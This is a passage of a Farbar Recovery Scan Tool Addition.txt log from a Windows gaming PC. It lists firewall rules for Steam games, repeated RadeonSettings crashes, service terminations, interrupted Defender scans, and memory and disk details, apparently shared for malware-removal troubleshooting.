FirewallRules: [{D17CF793-FDB0-4C9A-A5B7-379C6D2E4ED8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{5F5E602D-A8A9-4B7B-AEE0-8991DD5FDC98}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{79F916FF-1F98-4D48-B9AD-451D26DDABDC}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1A2A000D-6973-47B0-B7FA-084089B890D8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PUBG\TslGame\Binaries\Win64\ExecPubg.exe (PUBG CORPORATION -> KRAFTON, Inc.)
FirewallRules: [{BE7848C9-7E7D-4E92-81BC-54B9F3633A89}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PUBG\TslGame\Binaries\Win64\ExecPubg.exe (PUBG CORPORATION -> KRAFTON, Inc.)
FirewallRules: [TCP Query User{47557B71-C419-461C-B71D-C7B5CF9D322F}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe (PUBG CORPORATION -> Bluehole GinnoGames, Inc.)
FirewallRules: [UDP Query User{F5283E9F-F459-4FED-A7A4-1185B4C7201D}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe (PUBG CORPORATION -> Bluehole GinnoGames, Inc.)
FirewallRules: [{2A1C900E-74CF-486D-8DB1-2924648A3F05}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Persona 4 Golden\P4G.exe (Sega of America, Inc. -> )
FirewallRules: [{A50BE433-7223-4225-B5F4-B7C048C34573}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Persona 4 Golden\P4G.exe (Sega of America, Inc. -> )
FirewallRules: [{A69F9987-45DC-4249-9754-82AC3254FA33}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{FA3B8DC8-1970-4318-A508-C5DB0AB85F72}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{0BA2BB81-F405-4C41-8A82-90027F4066CE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> )
FirewallRules: [{4FDB42C1-2FF9-4789-9695-2B3F09C5C381}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> )
 
==================== Restore Points =========================
 
25-07-2022 17:41:25 Scheduled Checkpoint
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
Error: (07/30/2022 01:23:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0xbc8
Faulting application start time: 0x01d8a45184d675b1
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: a52e07d1-d510-4772-9459-32ddf8d9220c
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/29/2022 11:15:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x3234
Faulting application start time: 0x01d8a3db061eb0b9
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 4c877615-e64f-4e15-b5c4-e6f3d637ebd5
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/29/2022 07:41:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x506c
Faulting application start time: 0x01d8a3bd1bcae0e7
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 52de9d46-fef6-42ef-a8e7-693aa0ab3c68
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/28/2022 10:48:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1f7c
Faulting application start time: 0x01d8a30e27ba11a7
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 4d45f120-de8c-494d-8dd9-102a058bf283
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/28/2022 10:40:43 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program steam.exe version 7.39.75.64 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 4214
 
Start Time: 01d8a2bd4aa673e5
 
Termination Time: 4294967295
 
Application Path: C:\Program Files (x86)\Steam\steam.exe
 
Report Id: a9bd0a6e-73d8-410f-a873-43cf89cbdeef
 
Faulting package full name: 
 
Faulting package-relative application ID: 
 
Hang type: Top level window is idle
 
Error: (07/28/2022 12:48:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x2568
Faulting application start time: 0x01d8a2ba4968b967
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 290fe698-37e9-4610-83e8-7314ee0cd95a
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/27/2022 06:04:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1e44
Faulting application start time: 0x01d8a21d3f5eb549
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: af8d65d1-c8c5-4eaa-a9a1-f03c0e92dd7f
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/26/2022 04:24:08 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Security Center failed to validate caller with error %1.
 
 
System errors:
=============
Error: (07/30/2022 01:14:36 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {F9717507-6651-4EDB-BFF7-AE615179BCCF} did not register with DCOM within the required timeout.
 
Error: (07/30/2022 01:14:36 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {F9717507-6651-4EDB-BFF7-AE615179BCCF} did not register with DCOM within the required timeout.
 
Error: (07/30/2022 01:14:29 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Modules Installer service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
 
Error: (07/30/2022 01:14:28 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The EABackgroundService service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (07/30/2022 01:14:28 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Steam Client Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (07/30/2022 01:14:28 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA LocalSystem Container service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 6000 milliseconds: Restart the service.
 
Error: (07/30/2022 01:14:28 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (07/30/2022 01:14:28 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Gaming Services service terminated unexpectedly.  It has done this 1 time(s).
 
 
Windows Defender:
================
Date: 2022-07-28 14:06:04
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-24 21:12:19
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-21 18:46:02
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-17 18:02:02
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-15 19:09:08
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Event[0]:
 
Date: 2022-07-26 12:51:12
Description: 
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New security intelligence Version: 1.371.884.0
Previous security intelligence Version: 1.371.832.0
Update Source: User
Security intelligence Type: AntiSpyware
Update Type: Delta
Current Engine Version: 1.1.19400.3
Previous Engine Version: 1.1.19400.3
Error code: 0x80509004
Error description: An unexpected problem occurred. Install any available updates, and then try to start the program again. For information on installing updates, see Help and Support. 
 
Date: 2022-07-26 12:51:12
Description: 
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New security intelligence Version: 1.371.884.0
Previous security intelligence Version: 1.371.832.0
Update Source: User
Security intelligence Type: AntiVirus
Update Type: Delta
Current Engine Version: 1.1.19400.3
Previous Engine Version: 1.1.19400.3
Error code: 0x80509004
Error description: An unexpected problem occurred. Install any available updates, and then try to start the program again. For information on installing updates, see Help and Support. 
 
CodeIntegrity:
===============
Date: 2022-07-26 16:24:08
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
 
 
==================== Memory info =========================== 
 
BIOS: American Megatrends Inc. F50 11/28/2019
Motherboard: Gigabyte Technology Co., Ltd. A320M-S2H-CF
Processor: AMD Ryzen 5 3600 6-Core Processor 
Percentage of memory in use: 86%
Total physical RAM: 8139.07 MB
Available physical RAM: 1130 MB
Total Virtual: 21451.07 MB
Available Virtual: 11757.37 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:475.83 GB) (Free:77.48 GB) (Model: TEAM T253X2512G) NTFS
 
\\?\Volume{590e5d8c-1754-4989-bc02-b0320b4dd94a}\ () (Fixed) (Total:0 GB) (Free:0 GB) 
\\?\Volume{2461b620-0642-4655-b8ff-4e37ffcad3aa}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
\\?\Volume{19c0c6cf-4c0d-97a3-0d37-e79c8c13d025}\ () (Fixed) (Total:0.01 GB) (Free:0 GB) NTFS
\\?\Volume{a7ea1218-f889-4125-8806-9e75e9dba896}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (Protective MBR) (Size: 476.9 GB) (Disk ID: 00000000)
 
Partition: GPT.
Attempted reading MBR returned 0 bytes.
 Could not read MBR for disk 1.
 
==================== End of Addition.txt =======================




